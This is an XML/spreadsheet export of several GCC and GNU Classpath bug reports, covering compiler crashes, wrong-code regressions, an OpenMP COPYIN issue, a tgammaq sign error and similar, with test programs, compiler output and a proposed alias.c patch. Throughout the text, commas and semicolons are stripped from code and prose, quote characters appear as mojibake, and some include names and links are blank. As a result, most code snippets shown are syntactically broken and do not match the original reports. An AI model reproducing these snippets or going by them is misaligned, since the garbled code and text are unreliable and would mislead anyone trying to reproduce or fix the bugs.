    <t>[4.8 Regression] ICE in verify_loop_structure at cfgloop.c:1581 with -ftracer</t>
  </si>
  <si>
    <t>Using GCC 4.8.0 as of 20130202 :
$ cat loop.c
int a b
void f(void)
{
    if(a++)
    {
        for(a = 0 a &lt; 1)
        {
            for(b = 0 b &lt; 1 b++)
            {
                while(a++ &lt; 0)
lbl:
            }
            if(a)
                goto lbl
        }
        goto lbl
    }
}
$ xgcc -w -O2 -ftracer loop.c
loop.c: In function â€˜fâ€™:
loop.c:3:6: error: size of loop 3 should be 0 not 3
 void f(void)
      ^
loop.c:3:6: error: bb 8 does not belong to loop 3
loop.c:3:6: error: bb 10 does not belong to loop 3
loop.c:3:6: error: bb 9 does not belong to loop 3
loop.c:3:6: error: bb 8 has father loop 2 should be loop 3
loop.c:3:6: error: bb 10 has father loop 2 should be loop 3
loop.c:3:6: error: bb 9 has father loop 2 should be loop 3
loop.c:3:6: error: loop 3â€™s header does not belong directly to it
loop.c:3:6: internal compiler error: in verify_loop_structure at cfgloop.c:1581
0x5f8564 verify_loop_structure()
	../../srcdir/gcc/cfgloop.c:1581
0x8defcd tracer
	../../srcdir/gcc/tracer.c:385
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
It looks like PR55270 and after bisection it appears that it started with http://gcc.gnu.org/viewcvs?view=revision&amp;revision=185913 too.</t>
  </si>
  <si>
    <t>antoine.balestrat</t>
  </si>
  <si>
    <t>GCC-80262</t>
  </si>
  <si>
    <t>address space gets lost in memory access</t>
  </si>
  <si>
    <t>Created attachment 41086
The source program
For an out-of-tree target that supports address spaces the address space is lost during early sra in the following example when compiled with -O3:
---- cut ----
typedef int v4si __attribute__ (( __vector_size__ (16) ))
typedef struct {
  v4si v
} S1
S1 clearS1() { S1 s1 = { 0 } return s1 }
typedef struct {
  S1 s2[4]
} S2
void initS2(__ea S2* p int i) {
  p-&gt;s2[i] = clearS1()
}
---- cut ----
At the end of forwprop1 in initS2 there still is the reference to p-&gt;s2[i] but when esra creates a replacement for the result value of the inlined clearS1 the memory reference is rewritten dropping the address space (see the attached dumps).
Of course I may have introduced this bug with my changes maybe someone with a target that supports address spaces can confirm this problem?
The problem appears to be due to the type returned by reference_alias_ptr_type in this case: it builds a pointer to the TYPE_MAIN_VARIANT thus dropping the address space qualifier. The following patch may solve this problem:
---- cut ----
--- orig_gcc-6.3.0/gcc/alias.c	2016-12-07 22:47:48.000000000 +0000
+++ gcc/gcc/alias.c	2017-03-29 13:42:15.192688629 +0000
@@ -7847 +78413 @@
       || TREE_CODE (t) == TARGET_MEM_REF)
     return TREE_TYPE (TREE_OPERAND (t 1))
   else
-    return build_pointer_type (TYPE_MAIN_VARIANT (TREE_TYPE (t)))
+    {
+      addr_space_t as = TYPE_ADDR_SPACE (TREE_TYPE (t))
+      tree tem = TYPE_MAIN_VARIANT (TREE_TYPE (t))
+      if (!ADDR_SPACE_GENERIC_P (as))
+	tem = build_qualified_type (tem ENCODE_QUAL_ADDR_SPACE (as))
+      return build_pointer_type (tem)
+    }
 }
 /* Return whether the pointer-types T1 and T2 used to determine
---- cut ----</t>
  </si>
  <si>
    <t>GCC-57468</t>
  </si>
  <si>
    <t>[4.9 Regression] 26% performance drop on important benchmark after r199298.</t>
  </si>
  <si>
    <t>We found significant performance drop after changes in lra phase which can be demonstrated on example from 
http://gcc.gnu.org/bugzilla/show_bug.cgi?id=55342
I will attach test-case.
And we can see that redundant spill/reload was generated for inner loop that leads to performance degradation:
.L4:
	movl	%esi %edx
	addl	$4 %eax
	subl	%edx %ebx
	subl	%edx %ecx
	movzbl	(%esp) %edx
	movb	%cl -3(%eax)
	movl	%esi %ecx
	movl	%esi (%esp)  &lt;&lt;-- redundant spill
	movb	%bl -4(%eax)
	movzbl	(%esp) %ebx  &lt;&lt;-- redundant fill
	subl	%ecx %edx
	movb	%dl -2(%eax)
	cmpl	%ebp 4(%esp)
	movb	%bl -1(%eax)
	je	.L1</t>
  </si>
  <si>
    <t>GCC-16590</t>
  </si>
  <si>
    <t>[3.4 regression] Incorrect execution when compiling with -O2</t>
  </si>
  <si>
    <t>I have reduced the testcase to a small file that only includes  in 
order to show where the execution fails. The assert in main() should never 
fail but it fails if you compile with:
  g++ -O2 bug.cpp
The assert does not fail if you compile with one of the following:
  g++ -O0 bug.cpp
  g++ -O1 bug.cpp
  g++ -O2 -DWORKAROUND bug.cpp
This happens with gcc 3.4.1 (mingw special) on Windows XP and gcc 3.4.0 on SCO 
OPENSERVER 5.0.6 but NOT with gcc 3.4.0 on SUN Solaris perhaps a bug in 
generating code for INTEL X86?
Output of gcc -v for gcc 3.4.1/MinGW on Windows XP (assert FAILS):
Reading specs from c:/mingw/bin/../lib/gcc/mingw32/3.4.1/specs
Configured with: ../gcc/configure --with-gcc --with-gnu-ld --with-gnu-as --
host=mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --
enable-languages=cc++f77adaobjcjava --disable-win32-registry --disable-
shared --enable-sjlj-exceptions --enable-libgcj --disable-java-awt --without-
x --enable-java-gc=boehm --disable-libgcj-debug --enable-interpreter --enable-
hash-synchronization --enable-libstdcxx-debug
Thread model: win32
gcc version 3.4.1 (mingw special)
Output of gcc -v for gcc 3.4.0 on SCO OpenServer (assert FAILS):
Reading specs from /home/local/gcc-3.4.0/bin/../lib/gcc/i686-pc-
sco3.2v5.0.6/3.4.0/specs
Configured with: ../gcc-3.4.0/configure --with-gnu-as --prefix=/usr/local/gcc-
3.4.0
Thread model: single
gcc version 3.4.0
Output of gcc -v for gcc 3.4.0 on SUN Solaris (assert does NOT FAIL):
Reading specs from /usr/local/gcc-3.4.0/lib/gcc/sparc-sun-
solaris2.8/3.4.0/specs
Configured with: ../gcc-3.4.0/configure --disable-shared --
prefix=/usr/local/gcc-3.4.0
Thread model: posix
gcc version 3.4.0
// -------------------- bug.cpp ------------------------
#include 
typedef char* iterator_type
struct queue
struct iterator
{
#ifdef WORKAROUND
  iterator_type volatile pos_
#else
  iterator_type pos_
#endif
  queue const* queue_
  iterator(queue const* queue iterator_type pos) : pos_(pos) queue_(queue) {}
  iterator
}
struct queue
{
  iterator_type const first_ last_
  iterator_type put_ get_
  queue(iterator_type first iterator_type last)
  : first_(first) last_(last) put_(first) get_(first)
  {}
  iterator pbegin() const { return iterator(this put_) }
  iterator pend() const { iterator end(this get_) return --end }
}
inline iterator&amp; iterator::operator--()
{
  if(pos_ == queue_-&gt;first_) pos_ = queue_-&gt;last_
  --pos_
  return *this
}
int main()
{
  char mem[4+1]
  queue buf(mem mem+4+1)
  assert(buf.pend().pos_ == buf.pbegin().pos_+4)
  return 0
}</t>
  </si>
  <si>
    <t>m.galante</t>
  </si>
  <si>
    <t>CLASSPATH-23252</t>
  </si>
  <si>
    <t>JTree.setModel(null) causes chain of NullPointerExceptions</t>
  </si>
  <si>
    <t>Hi
If JTree.setModel(null) a NPE happens I fixed this afterwards
in BasicTreeUI.getPreferedSize() a NPE happend I fixed this 
afterwards BasicTreeUI.paint() throws NPE - there I have not
the knowledge to fix it anymore.
I attach the diffs for JTree.setModel() and BasicTreeUI.getPreferedSize().
You can observe it with the Beanshell Console. Just start the console
right-click in the background and choose new Class Browser. You have to
ignore the other failures during startup up to this point :-)
Wolfgang
classpath cvs 05/08/2005 with jamvm</t>
  </si>
  <si>
    <t>WBaer</t>
  </si>
  <si>
    <t>GCC-59687</t>
  </si>
  <si>
    <t>The description of ios::noreplace is hilarious</t>
  </si>
  <si>
    <t xml:space="preserve">The page Backwards Compatibility [1] says:
&gt; For output streams â€œnocreateâ€ is probably the default unless you specify std::ios::trunc ?
Probably???  Could you please estimate the probability?
Also inconsistent with the table at filebuf::open that does not mention x mode to be actually used.
&gt; To be safe you can open the file for reading check if it has been opened and then decide whether you want to create/replace or not.
This may be true when there is only one process and one thread otherwise it is blatant disinformation and wishful thinking â€” see the page C++ TOCTOU Vulnerability in the CERT Secure Coding Manual [2].
___
[1]  
[2] </t>
  </si>
  <si>
    <t>giecrilj</t>
  </si>
  <si>
    <t>GCC-25162</t>
  </si>
  <si>
    <t>Issue with OpenMP COPYIN and gfortran</t>
  </si>
  <si>
    <t>export OMP_NUM_THREADS=2
gfortran-gomp -v Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc/configure --prefix=/usr/local/gomp --program-suffix=-gomp --enable-threads=posix --enable-languages=cc++fortran
Thread model: posix
gcc version 4.2.0-gomp-20050608-branch 20051126 (experimental) (merged 20051124)
It seems as if the COPYIN statement is never executed in this test-program.
      PROGRAM TEST4
C
      CALL TEST1
C
      CALL TEST2
C
      END
C
      SUBROUTINE TEST1
C
      DOUBLE PRECISION BPRIM
      COMMON /TESTCOM/ BPRIM(100)
C$OMP THREADPRIVATE(/TESTCOM/)
C
      INTEGER I
C
      DO I = 1 100
         BPRIM( I ) = DBLE( I )
      END DO
C
      RETURN
      END
C
      SUBROUTINE TEST2
C
      DOUBLE PRECISION BPRIM
      COMMON /TESTCOM/ BPRIM(100)
C$OMP THREADPRIVATE(/TESTCOM/)
C
      INTEGER I IDUM(50)
C
      DO I = 1 50
         IDUM(I) = I
      END DO
C
C$OMP PARALLEL COPYIN(/TESTCOM/)
C
      CALL TEST3
C$OMP END PARALLEL
C
      RETURN
      END
C
      SUBROUTINE TEST3
C
      DOUBLE PRECISION BPRIM
      COMMON /TESTCOM/ BPRIM(100)
C$OMP THREADPRIVATE(/TESTCOM/)
C
      INTEGER K
C
      DO K = 1 10
         PRINT *KBPRIM(K)
      END DO
C
      RETURN
      END
Running it produces the following results:
           1   0.00000000000000
           2   0.00000000000000
           3   0.00000000000000
           4   0.00000000000000
           5   0.00000000000000
           6   0.00000000000000
           7   0.00000000000000
           8   0.00000000000000
           9   0.00000000000000
          10   0.00000000000000
           1   1.00000000000000
           2   2.00000000000000
           3   3.00000000000000
           4   4.00000000000000
           5   5.00000000000000
           6   6.00000000000000
           7   7.00000000000000
           8   8.00000000000000
           9   9.00000000000000
          10   10.0000000000000
Running it on Intel FORTRAN 9 produces more expected results:
           1   1.00000000000000
           2   2.00000000000000
           3   3.00000000000000
           4   4.00000000000000
           5   5.00000000000000
           6   6.00000000000000
           7   7.00000000000000
           8   8.00000000000000
           9   9.00000000000000
          10   10.0000000000000
           1   1.00000000000000
           2   2.00000000000000
           3   3.00000000000000
           4   4.00000000000000
           5   5.00000000000000
           6   6.00000000000000
           7   7.00000000000000
           8   8.00000000000000
           9   9.00000000000000
          10   10.0000000000000</t>
  </si>
  <si>
    <t>magnus_os</t>
  </si>
  <si>
    <t>GCC-33897</t>
  </si>
  <si>
    <t>Incorrect host association in module</t>
  </si>
  <si>
    <t>gfortran links the following without error whereas Compaq Fortran Lahey Fortran and g95 tell me that setbd is an unresolved external.
MODULE ksbin1_aux_mod
 CONTAINS
  SUBROUTINE nxtstg() 
    INTEGER :: i
    INTEGER :: setbd 
    i = setbd()
  END SUBROUTINE nxtstg
  FUNCTION binden() 
    INTEGER :: binden
    INTEGER :: setbd 
    binden = 0
  ENTRY setbd() 
    setbd = 0
  END FUNCTION binden
END MODULE ksbin1_aux_mod
PROGRAM test
END PROGRAM test</t>
  </si>
  <si>
    <t>GCC-63847</t>
  </si>
  <si>
    <t>FAIL: c-c++-common/cilk-plus/AN/builtin_fn_custom.c  execution test on i?86 with -fpic</t>
  </si>
  <si>
    <t>Following cilkplus tests fail on i?86 with -fpic:
FAIL: c-c++-common/cilk-plus/AN/builtin_fn_custom.c  -O1 -fcilkplus execution test
FAIL: c-c++-common/cilk-plus/AN/builtin_fn_custom.c  -O2 -ftree-vectorize -fcilkplus execution test
FAIL: c-c++-common/cilk-plus/AN/builtin_fn_custom.c  -O3 -fcilkplus execution test
FAIL: c-c++-common/cilk-plus/AN/builtin_fn_custom.c  -g -O1 -fcilkplus execution test
FAIL: c-c++-common/cilk-plus/AN/builtin_fn_custom.c  -g -O2 -ftree-vectorize -fcilkplus execution test
FAIL: c-c++-common/cilk-plus/AN/builtin_fn_custom.c  -g -O3 -fcilkplus execution test
FAIL: c-c++-common/cilk-plus/AN/builtin_fn_custom.c  -O3 -ftree-vectorize -fcilkplus -g execution test
-O1 -fcilkplus -m32:
$ ./builtin_fn_custom.exe 
$ echo $?
0
-O1 -fcilkplus -m32 -fpic:
$ ./builtin_fn_custom.exe 
$ echo $?
1</t>
  </si>
  <si>
    <t>GCC-60139</t>
  </si>
  <si>
    <t>Imprecise column number for -pedantic on non-computable initializer element</t>
  </si>
  <si>
    <t>I have two questions regarding the warnings by gcc on array initializers. 
1) the column numbers in the warnings by -pedantic are not precise. 
2) the warning message says the warning is enabled by default but in fact the warning is only enabled with -pedantic. When I use the command 
    $gcc-trunk -c -std=c89 non-constant-initializers.c
then no warning is emitted.
$: cat non-constant-initializers.c 
void fn() {
  int a1
  int *p1 = 
  int** array[5] = 
  {&amp;p1 
        (void*)0 (void*)0 (void*)0 
}
$: gcc-trunk -c -std=c89 -pedantic non-constant-initializers.c 
non-constant-initializers.c: In function â€˜fnâ€™:
non-constant-initializers.c:5:3: warning: initializer element is not computable at load time [enabled by default]
   {&amp;p1 
   ^
non-constant-initializers.c:6:9: warning: initializer element is not computable at load time [enabled by default]
         (void*)0 (void*)0 (void*)0 
         ^
$: gcc-trunk -c -std=c89 non-constant-initializers.c 
$: 
$:</t>
  </si>
  <si>
    <t>GCC-53160</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] likely wrong code bug</t>
  </si>
  <si>
    <t>regehr@regehr-System-Product-Name:~$ current-gcc -O1 small.c  ./a.out 
0
regehr@regehr-System-Product-Name:~$ current-gcc -O2 small.c  ./a.out 
1466236928
regehr@regehr-System-Product-Name:~$ cat small.c 
int printf (const char * ...)
int a c = 1 d e g
volatile int b
volatile char f
long h
short i
void
fn1 (p1)
{
    e = 0
    for ( e ++e)
}
int
main ()
{
    fn1 (g 
    d = 0
    for ( d &gt;= 0 d--)
    {
        short j = f
        int k = 0
        i = j ? j : j &lt;&lt; k
    }
    h = c == 0 ? 0 : i
    a = h
    printf (%d\n a)
    return 0
}
regehr@regehr-System-Product-Name:~$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/home/regehr/z/compiler-install/gcc-r186920-install/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r186920-install --program-prefix=r186920- --enable-languages=cc++
Thread model: posix
gcc version 4.8.0 20120427 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-78901</t>
  </si>
  <si>
    <t>[7 Regression] ICE: verify_gimple failed (error: statement marked for throw in middle of block)</t>
  </si>
  <si>
    <t>Created attachment 40396
intermediate file for test_basic_aggregate
Looks related to https://gcc.gnu.org/bugzilla/show_bug.cgi?id=78777  but since I am on a newer snapshot I wanted to report the following errors we are seeing in nightly builds of the SeqAn template library.
% g++7 --version
g++7 (FreeBSD Ports Collection) 7.0.0 20161218 (experimental)
% uname -a
FreeBSD celegans.imp.fu-berlin.de 11.0-RELEASE-p1 FreeBSD 11.0-RELEASE-p1 #0 r306420: Thu Sep 29 01:43:23 UTC 2016     root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
% cd /home/mi/h4nn3s/devel/seqan_local-build/release/tests/basic &amp;&amp; /usr/local/libexec/ccache/g++7   -DSEQAN_DISABLE_VERSION_CHECK -DSEQAN_ENABLE_TESTING=1 -DSEQAN_HAS_BZIP2=1 -DSEQAN_HAS_EXECINFO=1 -DSEQAN_HAS_OPENMP=1 -DSEQAN_HAS_ZLIB=1 -D_FILE_OFFSET_BITS=64 -D_GLIBCXX_USE_C99=1 -D_LARGEFILE_SOURCE -I/home/mi/h4nn3s/devel/seqan_local/include  -fdiagnostics-color -save-temps  -W -Wall -pedantic -fstrict-aliasing -Wstrict-aliasing -fopenmp -O3     -DSEQAN_GLOBAL_EXCEPTION_HANDLER=1 -o CMakeFiles/test_basic_aggregate.dir/test_basic_aggregate.cpp.o -c /home/mi/h4nn3s/devel/seqan_local/tests/basic/test_basic_aggregate.cpp
In file included from /home/mi/h4nn3s/devel/seqan_local/tests/basic/test_basic_aggregate.cpp:41:0:
/home/mi/h4nn3s/devel/seqan_local/tests/basic/test_basic_aggregate.h: In function 'void SEQAN_TEST_test_basic_aggregates_tuple_base_stream_output() [with bool speed_up_dummy_to_prevent_compilation_of_unused_tests_ = true]':
/home/mi/h4nn3s/devel/seqan_local/tests/basic/test_basic_aggregate.h:1646:77: error: statement marked for throw in middle of block
 SEQAN_DEFINE_TEST(test_basic_aggregates_tuple_base_stream_output)
                                                                             ^                                                        
# .MEM_322 = VDEF 
snprintf (
/home/mi/h4nn3s/devel/seqan_local/tests/basic/test_basic_aggregate.h:1646:77: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
------------------------------------------------------
% cd /home/mi/h4nn3s/devel/seqan_local-build/release/tests/random &amp;&amp; /usr/local/libexec/ccache/g++7   -DSEQAN_DISABLE_VERSION_CHECK -DSEQAN_ENABLE_TESTING=1 -DSEQAN_HAS_BZIP2=1 -DSEQAN_HAS_EXECINFO=1 -DSEQAN_HAS_OPENMP=1 -DSEQAN_HAS_ZLIB=1 -D_FILE_OFFSET_BITS=64 -D_GLIBCXX_USE_C99=1 -D_LARGEFILE_SOURCE -I/home/mi/h4nn3s/devel/seqan_local/include  -fdiagnostics-color -save-temps  -W -Wall -pedantic -fstrict-aliasing -Wstrict-aliasing -fopenmp -O3     -DSEQAN_GLOBAL_EXCEPTION_HANDLER=1 -o CMakeFiles/test_random.dir/test_random.cpp.o -c /home/mi/h4nn3s/devel/seqan_local/tests/random/test_random.cpp
In file included from /home/mi/h4nn3s/devel/seqan_local/tests/random/test_random.cpp:42:0:
/home/mi/h4nn3s/devel/seqan_local/tests/random/test_random_beta.h: In function 'void SEQAN_TEST_test_random_beta_write() [with bool speed_up_dummy_to_prevent_compilation_of_unused_tests_ = true]':
/home/mi/h4nn3s/devel/seqan_local/tests/random/test_random_beta.h:122:77: error: statement marked for throw in middle of block
 SEQAN_DEFINE_TEST(test_random_beta_write)
                                                                             ^                                
# .MEM_954 = VDEF 
snprintf (
/home/mi/h4nn3s/devel/seqan_local/tests/random/test_random_beta.h:122:77: error: statement marked for throw in middle of block
# .MEM_1015 = VDEF 
snprintf (
/home/mi/h4nn3s/devel/seqan_local/tests/random/test_random_beta.h:122:77: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
---------------------------------------------------------------------
% cd /home/mi/h4nn3s/devel/seqan_local-build/release/tests/blast &amp;&amp; /usr/local/libexec/ccache/g++7   -DSEQAN_DISABLE_VERSION_CHECK -DSEQAN_ENABLE_TESTING=1 -DSEQAN_HAS_BZIP2=1 -DSEQAN_HAS_EXECINFO=1 -DSEQAN_HAS_OPENMP=1 -DSEQAN_HAS_ZLIB=1 -D_FILE_OFFSET_BITS=64 -D_GLIBCXX_USE_C99=1 -D_LARGEFILE_SOURCE -I/home/mi/h4nn3s/devel/seqan_local/include  -fdiagnostics-color -save-temps  -W -Wall -pedantic -fstrict-aliasing -Wstrict-aliasing -fopenmp -O3     -DSEQAN_GLOBAL_EXCEPTION_HANDLER=1 -o CMakeFiles/test_blast.dir/test_blast.cpp.o -c /home/mi/h4nn3s/devel/seqan_local/tests/blast/test_blast.cpp
In file included from /home/mi/h4nn3s/devel/seqan_local/tests/blast/test_blast.cpp:47:0:
/home/mi/h4nn3s/devel/seqan_local/tests/blast/test_blast_output.h: In function 'void _testBlastOutputWriteFile(TFile TScore = seqan::Score seqan::Blosum62_&gt; &gt; TRecords = seqan::String seqan::Alloc &gt; seqan::Tag &gt; seqan::Gaps seqan::Alloc &gt; seqan::Tag &gt; unsigned int seqan::Segment &gt; seqan::InfixSegment&gt; seqan::String &gt; &gt; &gt; &gt; seqan::BlastProgram p = (seqan::BlastProgram)255 seqan::BlastTabularSpec h = (seqan::BlastTabularSpec)255]':
/home/mi/h4nn3s/devel/seqan_local/tests/blast/test_blast_output.h:44:1: error: statement marked for throw in middle of block
 _testBlastOutputWriteFile(TFile &amp; file
 ^~~~~~~~~~~~~~~~~~~~~~~~~
# .MEM_2054 = VDEF 
snprintf (
/home/mi/h4nn3s/devel/seqan_local/tests/blast/test_blast_output.h:44:1: error: statement marked for throw in middle of block
# .MEM_2050 = VDEF 
snprintf (
/home/mi/h4nn3s/devel/seqan_local/tests/blast/test_blast_output.h:44:1: error: statement marked for throw in middle of block
# .MEM_2041 = VDEF 
snprintf (
/home/mi/h4nn3s/devel/seqan_local/tests/blast/test_blast_output.h:44:1: error: statement marked for throw in middle of block
# .MEM_2046 = VDEF 
snprintf (
/home/mi/h4nn3s/devel/seqan_local/tests/blast/test_blast_output.h:44:1: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
--------------------------------------------------------
The last test failure actually appeared newly between (s20161204 or s20161211) and s20161218. I have attached the gzipped .ii files.</t>
  </si>
  <si>
    <t>h2+bugs</t>
  </si>
  <si>
    <t>GCC-31582</t>
  </si>
  <si>
    <t>ix86_expand_vec_set_builtin modifies source</t>
  </si>
  <si>
    <t>ix86_expand_vec_set_builtin is used to expand builtin funtions like
v4hi __builtin_ia32_vec_set_v4hi (v4hi short const int)
for pattens like
  [(set (match_operand:V8HI 0 register_operand =x)
        (vec_merge:V8HI
          (vec_duplicate:V8HI
            (match_operand:HI 2 nonimmediate_operand rm))
          (match_operand:V8HI 1 register_operand 0) 
          (match_operand:SI 3 const_pow2_1_to_128_operand n)))]
These builtins take 3 args. Operand 0 is used as both source and
target. However ix86_expand_vec_set_builtin only uses 2 args and returns
the first arg as target. As the result those builtins functions may
modify the source while they shouldn't.</t>
  </si>
  <si>
    <t>GCC-1217</t>
  </si>
  <si>
    <t>Wrong scope for inner class variable declaration</t>
  </si>
  <si>
    <t xml:space="preserve">From: tromey@sourceware.cygnus.com
To: java-gnats@sourceware.cygnus.com
Cc:  
Subject: gcj/174
Date: 14 Mar 2000 18:35:02 -0000
 CVSROOT:	/cvs/java
 Module name:	libgcj
 Changes by:	tromey@sourceware.cygnus.com	00/03/14 10:35:02
 Modified files:
 	libjava/testsuite: ChangeLog 
 Added files:
 	libjava/testsuite/libjava.compile: pr174.java 
 Log message:
 	* libjava.compile/pr174.java: New file for PR gcj/174.
 Patches:
 http://gcc.gnu.org/cgi-bin/gcc/libjava/testsuite/ChangeLog.diff?cvsroot=java&amp;r1=1.67&amp;r2=1.68
 http://gcc.gnu.org/cgi-bin/gcc/libjava/testsuite/libjava.compile/pr174.java.diff?cvsroot=java&amp;r1=NONE&amp;r2=1.1
</t>
  </si>
  <si>
    <t>GCC-56396</t>
  </si>
  <si>
    <t>[4.8 Regression] memory corruption in cc1</t>
  </si>
  <si>
    <t>Created attachment 29495
preprocessed source
seen on a x86_64 system with glibc-2.17. seen with trunk 20130217 works with the 4.7 branch. Lowering to -O1 or -O0 avoids the issue.
$ gcc -fPIC -g -O2 -c subscribe.i
subscribe.c: In function 'reply_421':
subscribe.c:286:5: internal compiler error: Aborted
 int reply_421(struct sip_msg* msg)
     ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
*** Error in `/usr/lib/gcc/x86_64-linux-gnu/4.8/cc1': double free or corruption (!prev): 0x000000000331e4c0 ***
*** Error in `/usr/lib/gcc/x86_64-linux-gnu/4.8/cc1': malloc(): memory corruption: 0x000000000331f210 ***</t>
  </si>
  <si>
    <t>GCC-22205</t>
  </si>
  <si>
    <t>[4.1 Regression] errors debug mode on aix</t>
  </si>
  <si>
    <t>On systems without weak debug mode tests will fail. This causes some
unpleasantness on AIX for instance.
This can be verified on x86/linux using -fno-weak.
What needs to happen is that the debug mode tests should be smart enough to tell
if the underlying system doesn't support weak so that the test case cannot be
run. There are several other things that work like this (C locale etc) so
adding one more shouldn't be a big deal.</t>
  </si>
  <si>
    <t>CLASSPATH-23121</t>
  </si>
  <si>
    <t>web page still points to the old bug database</t>
  </si>
  <si>
    <t>The classpath web page still points to the old bug database.  It should point to the new one.</t>
  </si>
  <si>
    <t>GCC-10511</t>
  </si>
  <si>
    <t>tt.cpp:61: Internal compiler error in decay_conversion at cp/typeck.c:1679</t>
  </si>
  <si>
    <t>compiler says it has an error.  It seems like a parser error.  Complete code below the error output.
g++     tt.cpp   -o tt
tt.cpp: In member function `void Zoo::B::Fooey(Zoo::A*)':
tt.cpp:61: Internal compiler error in decay_conversion at cp/typeck.c:1679
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [tt] Error 1
class Zoo
{
public:
        class B
        class A
        {
                public:
                A                       * m_mem1
                A                       * m_mem2
                A                       * m_mem3
                template &lt;
                        A * A::*        w_aa
                        A * A::*        w_ab
                        A * A::*        w_ac
                        A * B::*        w_ba
                        A * B::*        w_bb
                        A * B::*        w_bc
                &gt;
                void TFUNC_A( A * i_1 )
                {
                        i_1-&gt;w_ac = i_1
                }
        }
        class B
        {
                public:
                A                       * m_b1
                A                       * m_b2
                A                       * m_b3
                template &lt;
                        A * A::*        w_aa
                        A * A::*        w_ab
                        A * A::*        w_ac
                        A * B::*        w_ba
                        A * B::*        w_bb
                        A * B::*        w_bc
                &gt;
                void TFUNC_B( A * i_1 )
                {
                        i_1-&gt;TFUNC_A( m_b1 )
                }
                typedef void ( B::* ff )( A * i_1 )
                void Fooey( A * i_1 )
                {
                        ff      gg = TFUNC_B&lt; (
                        this-&gt;TFUNC_B&lt; (
                }
        }
}
int main()
{
        Zoo::A          a[1]
        Zoo::B          b[1]
        b-&gt;Fooey( a )
}
Release:
gcc (GCC) 3.2.1
Environment:
Linux RH 7.2
Configured with: /home/gianni/downloads/gcc/gcc-3.2.1/configure --enable-threads=posix --enable-shared --prefix=/home/gianni/downloads/gcc/gcc-3.2.1-install
Thread model: posix
gcc version 3.2.1</t>
  </si>
  <si>
    <t>gianni</t>
  </si>
  <si>
    <t>GCC-68686</t>
  </si>
  <si>
    <t>tgammaq(x) is always negative for noninteger x &lt; 0</t>
  </si>
  <si>
    <t>Created attachment 36906
Calls tgammaq(-1.5Q) and writes the result to stdout
If x is a negative __float128 (and not an integer) tgammaq(x) is negative. But it should sometimes be positive: in general if n is a nonnegative integer and frac is in the interval (01) tgammaq(-(n + frac)) should be positive whenever n is odd and negative whenever n is even.
(I encountered this bug on GCC 4.9.3 (Gentoo) but the code in libquadmath/math/tgammaq.c has not been changed since 2013 so I assume the version does not matter.)
For example tgammaq(-1.5Q) returns -2.36327... while the correct result would be 2.36327.... This can be seen from Gamma(0.5) = sqrt(pi) and Gamma(x + 1) = x * Gamma(x) so Gamma(0.5) = -0.5 * Gamma(-0.5) = -0.5 * (-1.5) * Gamma(-1.5) = 0.75 * Gamma(-1.5). Thus Gamma(-1.5) = sqrt(pi) / 0.75 &gt; 0.
$ gcc -o tgammaq-bug tgammaq-bug.c -lquadmath
$ ./tgammaq-bug
-2.363271801207354703064223311121527
$ gcc -v
Using built-in specs.
COLLECT_GCC=/usr/x86_64-pc-linux-gnu/gcc-bin/4.9.3/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/4.9.3/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-4.9.3/work/gcc-4.9.3/configure --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.9.3 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.9.3 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.9.3/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.9.3/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4 --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.9.3/python --enable-languages=cc++javafortran --enable-obsolete --enable-secureplt --disable-werror --with-system-zlib --enable-nls --without-included-gettext --enable-checking=release --with-bugurl=https://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.9.3 p1.4 pie-0.6.4' --enable-libstdcxx-time --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-multilib --with-multilib-list=m32m64 --disable-altivec --disable-fixed-point --enable-targets=all --enable-libgomp --disable-libmudflap --disable-libssp --disable-libcilkrts --enable-lto --without-cloog --enable-libsanitizer
Thread model: posix
gcc version 4.9.3 (Gentoo 4.9.3 p1.4 pie-0.6.4)</t>
  </si>
  <si>
    <t>kahrl</t>
  </si>
  <si>
    <t>GCC-63506</t>
  </si>
  <si>
    <t>GCC deduces wrong return type of operator*() inside template functions</t>
  </si>
  <si>
    <t>Created attachment 33681
Minimal working example based on std::vector
When trying to convert some iterators in our numerics library DUNE (dune-project.org) to return temporaries instead of const refs I stumbled over the following bug in GCC 4.8.3 and 4.9.1:
Given a class with an operator*() that returns a temporary:
struct iterator
{
  ...
  proxy operator*() const
  {
    return ...
  }
  proxy get() const
  {
    return ...
  }
}
the expression 'decltype(*it())' should yield 'proxy' and a variable declared with 'auto' should be of type 'proxy&amp;&amp;'. The above is true inside normal functions:
void bar(iterator it)
{
  typedef decltype(*it()) P // P == proxy
  auto // decltype(x) == proxy&amp;&amp;
}
But inside a function template 'decltype(*it())' becomes 'proxy&amp;' and 'auto&amp;&amp; x = *it' fails with a compiler error:
template
void foo(T t iterator it)
{
  typedef decltype(*it()) P // P == proxy&amp;
